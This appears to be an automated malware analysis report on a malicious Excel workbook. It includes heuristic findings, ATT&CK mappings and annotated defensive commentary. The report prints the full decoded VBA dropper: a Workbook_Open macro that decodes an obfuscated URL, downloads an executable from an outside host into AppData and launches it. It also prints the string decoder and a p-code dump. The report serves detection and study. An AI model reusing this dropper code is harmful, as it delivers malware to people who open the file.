MALICIOUS
276
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro that runs automatically when the workbook is opened with macros enabled. This code uses the URLDownloadToFile API to download a second-stage payload from a URL constructed from obfuscated strings and saves it to the AppData directory. The macro also references ShellExecuteA, indicating an intent to execute the downloaded file. The document body contains a lure to 'enable content' to view a transaction receipt, further supporting its role as a dropper.
Heuristics (8)
-
ClamAV: Xls.Dropper.Agent-7776231-0 — severity: critical — rule CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Dropper.Agent-7776231-0
-
Reference to URLDownloadToFile API — severity: critical — rule SC_STR_URLDOWNLOAD: Reference to URLDownloadToFile API
-
VBA macros detected — severity: medium — 3 related findings — rule OLE_VBA_MACROS: Document contains VBA macro code
-
URLDownloadToFile in VBA — severity: critical — rule OLE_VBA_DOWNLOAD: URLDownloadToFile in VBA. Matched line in script:
Private Declare PtrSafe Function xstrwib Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal iLnXosvmLoTDzoIy As Long, ByVal pDNwwjV As String, _ ByVal wSguctfj As String, ByVal IxuoGDZwUbWimA As Long, ByVal VXhql As Long) As Long -
Workbook_Open macro — severity: low — rule OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Private Sub Workbook_Open() -
Environ() call (env variable access) — severity: low — rule OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script:
GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx = GJCgcgjggcCc("fyf/fyss") JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx = Environ$("AppData") & "\" & GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx -
Reference to ShellExecute API — severity: high — rule SC_STR_SHELLEXEC: Reference to ShellExecute API
-
Macro/content-enable lure — severity: medium — rule SE_ENABLE_LURE: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13484 bytes |

SHA-256: 8b455a43231021b6664cadca3d26e079cc996db75dfa1b5c9cced5c0db8566b2
Preview script — first 1,000 lines of the extracted script:
' Standard module stream "Module1". The recovered source holds only the
' empty Sub that follows.
' NOTE(review): the p-code dump further down in this report names the
' procedure in this stream differently from the recovered source (compare
' the FuncDefn lines). A source/p-code mismatch is a known artefact of
' VBA stomping or purging, so confirm which listing is the one Office would
' actually run before relying on either.
Attribute VB_Name = "Module1"
' Empty stub. Nothing in the recovered source calls it; it contributes no
' behaviour and appears to exist only so the module is not empty.
Sub Frinm()
End Sub
' Document module "WilGhnMkbook" — presumably the workbook's ThisWorkbook
' module under a renamed VB_Name (the VB_Base CLSID is the one Excel uses for
' its Workbook class; verify if it matters). VB_PredeclaredId = True means
' the module is instantiated automatically, which is what allows the
' Workbook_Open handler below to fire as soon as macros are enabled.
Attribute VB_Name = "WilGhnMkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Win32 import: shell32!ShellExecuteA bound under the random name xbFplZu.
' Parameter order follows the API (hwnd, lpOperation, lpFile, lpParameters,
' lpDirectory, nShowCmd); only the local names are randomised. Renaming the
' binding hides the API name from a casual read of the call sites, but the
' Alias clause still carries it, which is what the SC_STR_SHELLEXEC
' heuristic above matched on.
Private Declare PtrSafe Function xbFplZu Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal Ofx As Long, ByVal RlfUAJ As String, _
ByVal JHMyrydpp As String, ByVal EILDcrkT As String, ByVal BEYBF As String, ByVal TezMz As Long) As Long
' Win32 import: urlmon!URLDownloadToFileA bound under the random name
' xstrwib. Parameter order follows the API (pCaller, szURL, szFileName,
' dwReserved, lpfnCB). As with the ShellExecuteA import, the Alias string is
' what the OLE_VBA_DOWNLOAD / SC_STR_URLDOWNLOAD heuristics matched on.
' Defender note: an Office process loading urlmon and writing a file is an
' unusual combination worth alerting on regardless of the binding name.
Private Declare PtrSafe Function xstrwib Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal iLnXosvmLoTDzoIy As Long, ByVal pDNwwjV As String, _
ByVal wSguctfj As String, ByVal IxuoGDZwUbWimA As Long, ByVal VXhql As Long) As Long
' Dropper routine, called from Workbook_Open below. Sequence:
'   1. decode the payload filename and build a path under %AppData%,
'   2. decode the download URL,
'   3. fetch the file with URLDownloadToFileA,
'   4. launch it with ShellExecuteA "open".
' The long mixed-case identifiers and the three unused String locals are
' padding with no effect on behaviour.
' Mitigation/detection: blocking macros in files carrying Mark-of-the-Web,
' or enforcing a signed-macro policy, stops this before Workbook_Open runs;
' behaviourally, Excel writing an executable under %AppData% and then
' spawning it is the chain to alert on.
Private Sub TuZyYpYcV()
' decoded download URL
Dim ZbzzbhsdbgfdbgbHVJHJHFDHVFVdsfzgYFHJGMDFSDFDFSGFDGFHmjvjhvhjvVVVHjhVHJHVVHVAFjHBfhNinv As String
' decoded payload filename
Dim GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx As String
' full destination path: %AppData%\<filename>
Dim JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx As String
' the next three locals are never read or written — padding
Dim GFBFSDVhjkyvyGKYGYGNggHTFNGVGFNHVVHMVVhvMV As String
Dim MGJHVMVVMmhvvbvMVVVVVVMVHhmvhVHDSfgxfxdfHVHJJKVgvmh As String
Dim UGkygyygjkfjfFJFFDGFHFfkffjtdtFDDFHfhGCNCHCCCgh As String
' GJCgcgjggcCc reverses the literal and shifts every character code down by
' one; the leading "fyf/" ends up as a trailing ".exe", so this is the
' payload's filename.
GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx = GJCgcgjggcCc("fyf/fyss")
' Drop location is the user's roaming AppData folder (writable without
' elevation), which is what the OLE_VBA_ENVIRON heuristic flagged.
JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx = Environ$("AppData") & "\" & GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx
' Same decoder applied to the second-stage URL (kept encoded here; run the
' decoder offline if the plaintext is needed as an IoC).
ZbzzbhsdbgfdbgbHVJHJHFDHVFVdsfzgYFHJGMDFSDFDFSGFDGFHmjvjhvhjvVVVHjhVHJHVVHVAFjHBfhNinv = GJCgcgjggcCc("fyf/KLKOLEDWIHIIZUX0F[OPSC0mq/{jc/eqvujyjnfmjo/xxx00;tquui")
' URLDownloadToFileA(pCaller=0, szURL, szFileName, dwReserved=0, lpfnCB=0).
' The return value is discarded, so a failed download still falls through
' to the ShellExecute call below.
xstrwib 0, ZbzzbhsdbgfdbgbHVJHJHFDHVFVdsfzgYFHJGMDFSDFDFSGFDGFHmjvjhvhjvVVVHjhVHJHVVHVAFjHBfhNinv, JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx, 0, 0
' ShellExecuteA(hwnd=0, "open", <dropped file>, params="", dir=NULL,
' nShowCmd=vbNormalFocus): runs the downloaded executable in a visible window.
xbFplZu 0, "open", JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx, "", vbNullString, vbNormalFocus
End Sub
' Auto-execution entry point. Excel raises Workbook_Open when the file is
' opened with macros enabled, so the only user interaction required is the
' "Enable Content" click the document body lures the reader into (see the
' SE_ENABLE_LURE finding above). Delegates straight to the dropper routine.
Private Sub Workbook_Open()
TuZyYpYcV
End Sub
' Dead-code filler: nothing in the recovered source calls this function,
' and it never sets a return value. Presumably generated to bulk out the
' module and churn hashes/heuristics rather than to compute anything; the
' inconsistencies are typical of such filler:
'   - ...fdb57d5 is declared but the assignment goes to ...fdb57d7,
'   - Byte locals are assigned values far outside 0..255 (an Overflow
'     error at runtime if this ever executed),
'   - the outer If has no matching End If in the recovered text (the p-code
'     dump below also shows a single EndIfBlock for this function).
' The near-identical function that follows differs only in constants.
Public Function JHBMMBHJvhvhvVFfhFDDD3333333reedd(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1abadd648e22b16fdb57d5 As Double
be3a8c1f30f1abadd648e22b16fdb57d7 = 642.162
Dim columnwall As Byte
columnwall = 44414.429
Dim t0ea0a0840384a15e019665b2e996b73f As Long
t0ea0a0840384a15e019665b2e996b73f = 564.954
Dim n2b549c2e42dc58d564726b5780212aza As Double
n2b549c2e42dc58d564726b5780212aza = 895.115
dhmpmrvyvrxwv = vbNullString
Dim m974e3e334b64ac13b6dec997fbabf21f As String
m974e3e334b64ac13b6dec997fbabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 19.227
Dim z2c55929d38494d4bf3ab6ba3dd16305c As Boolean
z2c55929d38494d4bf3ab6ba3dd16305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fba0 As Double
b9d76f7072ca3da29e82e55579143fba0 = 108.662
' Like-pattern test against "*<burgerorgan>*"; the branch body only assigns
' locals that are never read.
If Not bonusshoot Like qoxnwkqnhfshhimr Then
dhmpmrvyvrxwv = burgerorgan
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
If kqeepfyakmzwuediw <> 189.252 Then
Dim flamesight As Byte
flamesight = 212.797
Dim sweartrust As Long
sweartrust = 235.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function
' Second copy of the dead-code filler above with different numeric
' constants; likewise never called, never assigns a return value, declares
' ...fdb57d5 but assigns ...fdb57d7, stores out-of-range values in Byte
' locals, and lacks an End If for the outer If in the recovered text.
' No effect on the dropper's behaviour.
Public Function HJvhvhvVFfhFDDD3333333reedd(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1abadd648e22b16fdb57d5 As Double
be3a8c1f30f1abadd648e22b16fdb57d7 = 42.162
Dim columnwall As Byte
columnwall = 44414.429
Dim t0ea0a0840384a15e019665b2e996b73f As Long
t0ea0a0840384a15e019665b2e996b73f = 64.954
Dim n2b549c2e42dc58d564726b5780212aza As Double
n2b549c2e42dc58d564726b5780212aza = 895.115
dhmpmrvyvrxwv = ""
Dim m974e3e334b64ac13b6dec997fbabf21f As String
m974e3e334b64ac13b6dec997fbabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 19.227
Dim z2c55929d38494d4bf3ab6ba3dd16305c As Boolean
z2c55929d38494d4bf3ab6ba3dd16305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fba0 As Double
b9d76f7072ca3da29e82e55579143fba0 = 108.662
If Not bonusshoot Like qoxnwkqnhfshhimr Then
dhmpmrvyvrxwv = burgerorgan
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
If kqeepfyakmzwuediw <> 89.252 Then
Dim flamesight As Byte
flamesight = 112.797
Dim sweartrust As Long
sweartrust = 35.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function
' String decoder used for every sensitive literal in the dropper routine.
' Reverses the input, then subtracts 1 from each character code (a simple
' shift cipher); e.g. the "fyf/" prefix of the encoded literals becomes a
' trailing ".exe". Because `enc` is a ByRef Variant, the caller's variable
' would be overwritten with the reversed text as a side effect — the
' callers above pass literals, so nothing observable happens. The local
' named AppData is only the accumulator; it has nothing to do with the
' Environ$("AppData") lookup in the caller.
' Detection note: StrReverse + Chr(Asc(x) - 1) loops are a common
' macro-obfuscation signature worth a rule of their own.
Private Function GJCgcgjggcCc(enc)
Dim x, v, AppData
enc = StrReverse(enc)
For v = 1 To Len(enc)
x = Mid(enc, v, 1)
AppData = AppData & Chr(Asc(x) - 1)
Next
GJCgcgjggcCc = AppData
End Function
' Worksheet document modules Sheet1..Sheet3: module attributes only, no
' procedures. All three share one VB_Base CLSID (presumably Excel's
' Worksheet class). Nothing here executes.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_f8a1t7q1
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 952 bytes
' Line #0:
' FuncDefn (Sub RlfUAJ())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/WilGhnMkbook - 7837 bytes
' Line #0:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function EILDcrkT Lib "wSguctfj" (ByVal BEYBF As Long, ByVal TezMz As String, ByVal shell32.dll As String, ByVal xstrwib As String, ByVal iLnXosvmLoTDzoIy As String, ByVal pDNwwjV As Long) As Long)
' Line #1:
' Line #2:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function IxuoGDZwUbWimA Lib "JTFJTHgfmfGcGNggCGCGcgVVvvmvvBMVBVVVDGGSsesdfxgx" (ByVal VXhql As Long, ByVal urlmon As String, ByVal TuZyYpYcV As String, ByVal ZbzzbhsdbgfdbgbHVJHJHFDHVFVdsfzgYFHJGMDFSDFDFSGFDGFHmjvjhvhjvVVVHjhVHJHVVHVAFjHBfhNinv As Long, ByVal GVMHVhvVHVVMVVVvvmvvBMVBVVVDGGSsesdfxgx As Long) As Long)
' Line #3:
' Line #4:
' FuncDefn (Private Sub GFBFSDVhjkyvyGKYGYGNggHTFNGVGFNHVVHMVVhvMV())
' Line #5:
' Dim
' VarDefn MGJHVMVVMmhvvbvMVVVVVVMVHhmvhVHDSfgxfxdfHVHJJKVgvmh (As String)
' Line #6:
' Dim
' VarDefn UGkygyygjkfjfFJFFDGFHFfkffjtdtFDDFHfhGCNCHCCCgh (As String)
' Line #7:
' Dim
' VarDefn GJCgcgjggcCc (As String)
' Line #8:
' Dim
' VarDefn Environ (As String)
' Line #9:
' Dim
' VarDefn vbNullString (As String)
' Line #10:
' Dim
' VarDefn vbNormalFocus (As String)
' Line #11:
' LitStr 0x0008 "fyf/fyss"
' ArgsLd Workbook_Open 0x0001
' St UGkygyygjkfjfFJFFDGFHFfkffjtdtFDDFHfhGCNCHCCCgh
' Line #12:
' LitStr 0x0007 "AppData"
' ArgsLd Sheet1$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld UGkygyygjkfjfFJFFDGFHFfkffjtdtFDDFHfhGCNCHCCCgh
' Concat
' St GJCgcgjggcCc
' Line #13:
' Line #14:
' Line #15:
' LitStr 0x003A "fyf/KLKOLEDWIHIIZUX0F[OPSC0mq/{jc/eqvujyjnfmjo/xxx00;tquui"
' ArgsLd Workbook_Open 0x0001
' St MGJHVMVVMmhvvbvMVVVVVVMVHhmvhVHDSfgxfxdfHVHJJKVgvmh
' Line #16:
' Line #17:
' LitDI2 0x0000
' Ld MGJHVMVVMmhvvbvMVVVVVVMVHhmvhVHDSfgxfxdfHVHJJKVgvmh
' Ld GJCgcgjggcCc
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall IxuoGDZwUbWimA 0x0005
' Line #18:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld GJCgcgjggcCc
' LitStr 0x0000 ""
' Ld Sheet2
' Ld Sheet3
' ArgsCall EILDcrkT 0x0006
' Line #19:
' EndSub
' Line #20:
' Line #21:
' FuncDefn (Private Sub Workbook())
' Line #22:
' Line #23:
' ArgsCall GFBFSDVhjkyvyGKYGYGNggHTFNGVGFNHVVHMVVhvMV 0x0000
' Line #24:
' EndSub
' Line #25:
' Line #26:
' FuncDefn (Public Function be3a8c1f30f1abadd648e22b16fdb57d5(be3a8c1f30f1abadd648e22b16fdb57d7, columnwall, id_FFFE As Variant))
' Line #27:
' LitStr 0x0001 "*"
' Ld be3a8c1f30f1abadd648e22b16fdb57d7
' Concat
' LitStr 0x0001 "*"
' Concat
' St t0ea0a0840384a15e019665b2e996b73f
' Line #28:
' Dim
' VarDefn n2b549c2e42dc58d564726b5780212aza (As Double)
' Line #29:
' LitR8 0xEF9E 0xC6A7 0x114B 0x4084
' St dhmpmrvyvrxwv
' Line #30:
' Dim
' VarDefn m974e3e334b64ac13b6dec997fbabf21f (As Byte)
' Line #31:
' LitR8 0x353F 0xBA5E 0xAFCD 0x40E5
' St m974e3e334b64ac13b6dec997fbabf21f
' Line #32:
' Dim
' VarDefn b08576ffe41cb67690655f1261f410844 (As Long)
' Line #33:
' LitR8 0x8312 0xCAC0 0xA7A1 0x4081
' St b08576ffe41cb67690655f1261f410844
' Line #34:
' Dim
' VarDefn z2c55929d38494d4bf3ab6ba3dd16305c (As Double)
' Line #35:
' LitR8 0xB852 0x851E 0xF8EB 0x408B
' St z2c55929d38494d4bf3ab6ba3dd16305c
' Line #36:
' Ld Sheet2
' St b9d76f7072ca3da29e82e55579143fba0
' Line #37:
' Dim
' VarDefn kqeepfyakmzwuediw (As String)
' Line #38:
' LitStr 0x000B "naiveremove"
' St kqeepfyakmzwuediw
' Line #39:
' Dim
' VarDefn flamesight (As Byte)
' Line #40:
' LitR8 0x3127 0xAC08 0x3A1C 0x4033
' St flamesight
' Line #41:
' Dim
' VarDefn sweartrust (As Boolean)
' Line #42:
' LitR8 0xE560 0x22D0 0x79DB 0x4057
' St sweartrust
' Line #43:
' Dim
' VarDefn prqhhqrabc (As Double)
' Line #44:
' LitR8 0x7CEE 0x353F 0x2A5E 0x405B
' St prqhhqrabc
' Line #45:
' Ld columnwall
' Ld t0ea0a0840384a15e019665b2e996b73f
' Like
' Not
' IfBlock
' Line #46:
' Ld be3a8c1f30f1abadd648e22b16fdb57d7
' St b9d76f7072ca3da29e82e55579143fba0
' Line #47:
' Dim
' VarDefn HJvhvhvVFfhFDDD3333333reedd (As Double)
' Line #48:
' LitR8 0x2B02 0x1687 0xBED9 0x404E
' St HJvhvhvVFfhFDDD3333333reedd
' Line #49:
' Ld HJvhvhvVFfhFDDD3333333reedd
' LitR8 0xD2F2 0x624D 0xA810 0x4067
' Ne
' IfBlock
' Line #50:
' Dim
' VarDefn enc (As Byte)
' Line #51:
' LitR8 0xDD2F 0x0624 0x9981 0x406A
' St enc
' Line #52:
' Dim
' VarDefn x (As Long)
' Line #53:
' LitR8 0xAC08 0x5A1C 0x7F64 0x406D
' St x
' Line #54:
' Dim
' VarDefn n (As String)
' Line #55:
' LitStr 0x000C "fadzjgdilazu"
' St n
' Line #56:
' EndIfBlock
' Line #57:
' EndFunc
' Line #58:
' FuncDefn (Public Function AppData(be3a8c1f30f1abadd648e22b16fdb57d7, columnwall, id_FFFE As Variant))
' Line #59:
' LitStr 0x0001 "*"
' Ld be3a8c1f30f1abadd648e22b16fdb57d7
' Concat
' LitStr 0x0001 "*"
' Concat
' St t0ea0a0840384a15e019665b2e996b73f
' Line #60:
' Dim
' VarDefn n2b549c2e42dc58d564726b5780212aza (As Double)
' Line #61:
' LitR8 0xF9DB 0x6A7E 0x14BC 0x4045
' St dhmpmrvyvrxwv
' Line #62:
' Dim
' VarDefn m974e3e334b64ac13b6dec997fbabf21f (As Byte)
' Line #63:
' LitR8 0x353F 0xBA5E 0xAFCD 0x40E5
' St m974e3e334b64ac13b6dec997fbabf21f
' Line #64:
' Dim
' VarDefn b08576ffe41cb67690655f1261f410844 (As Long)
' Line #65:
' LitR8 0x1893 0x5604 0x3D0E 0x4050
' St b08576ffe41cb67690655f1261f410844
' Line #66:
' Dim
' VarDefn z2c55929d38494d4bf3ab6ba3dd16305c (As Double)
' Line #67:
' LitR8 0xB852 0x851E 0xF8EB 0x408B
' St z2c55929d38494d4bf3ab6ba3dd16305c
' Line #68:
' LitStr 0x0000 ""
' St b9d76f7072ca3da29e82e55579143fba0
' Line #69:
' Dim
' VarDefn kqeepfyakmzwuediw (As String)
' Line #70:
' LitStr 0x000B "naiveremove"
' St kqeepfyakmzwuediw
' Line #71:
' Dim
' VarDefn flamesight (As Byte)
' Line #72:
' LitR8 0x3127 0xAC08 0x3A1C 0x4033
' St flamesight
' Line #73:
' Dim
' VarDefn sweartrust (As Boolean)
' Line #74:
' LitR8 0xE560 0x22D0 0x79DB 0x4057
' St sweartrust
' Line #75:
' Dim
' VarDefn prqhhqrabc (As Double)
' Line #76:
' LitR8 0x7CEE 0x353F 0x2A5E 0x405B
' St prqhhqrabc
' Line #77:
' Ld columnwall
' Ld t0ea0a0840384a15e019665b2e996b73f
' Like
' Not
' IfBlock
' Line #78:
' Ld be3a8c1f30f1abadd648e22b16fdb57d7
' St b9d76f7072ca3da29e82e55579143fba0
' Line #79:
' Dim
' VarDefn HJvhvhvVFfhFDDD3333333reedd (As Double)
' Line #80:
' LitR8 0x2B02 0x1687 0xBED9 0x404E
' St HJvhvhvVFfhFDDD3333333reedd
' Line #81:
' Ld HJvhvhvVFfhFDDD3333333reedd
' LitR8 0xA5E3 0xC49B 0x5020 0x4056
' Ne
' IfBlock
' Line #82:
' Dim
' VarDefn enc (As Byte)
' Line #83:
' LitR8 0xBA5E 0x0C49 0x3302 0x405C
' St enc
' Line #84:
' Dim
' VarDefn x (As Long)
' Line #85:
' LitR8 0xB021 0x6872 0xFD91 0x4041
' St x
' Line #86:
' Dim
' VarDefn n (As String)
' Line #87:
' LitStr 0x000C "fadzjgdilazu"
' St n
' Line #88:
' EndIfBlock
' Line #89:
' EndFunc
' Line #90:
' Line #91:
' FuncDefn (Private Function Workbook_Open(StrReverse, id_FFFE As Variant))
' Line #92:
' Dim
' VarDefn Chr
' VarDefn id_029A
' VarDefn v
' Line #93:
' Ld StrReverse
' ArgsLd id_0294 0x0001
' St StrReverse
' Line #94:
' StartForVariable
' Ld id_029A
' EndForVariable
' LitDI2 0x0001
' Ld StrReverse
' FnLen
' For
' Line #95:
' Ld StrReverse
' Ld id_029A
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St Chr
' Line #96:
' Ld v
' Ld Chr
' ArgsLd id_0298 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd id_0296 0x0001
' Concat
' St v
' Line #97:
' StartForVariable
' Next
' Line #98:
' Ld v
' St Workbook_Open
' Line #99:
' EndFunc
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes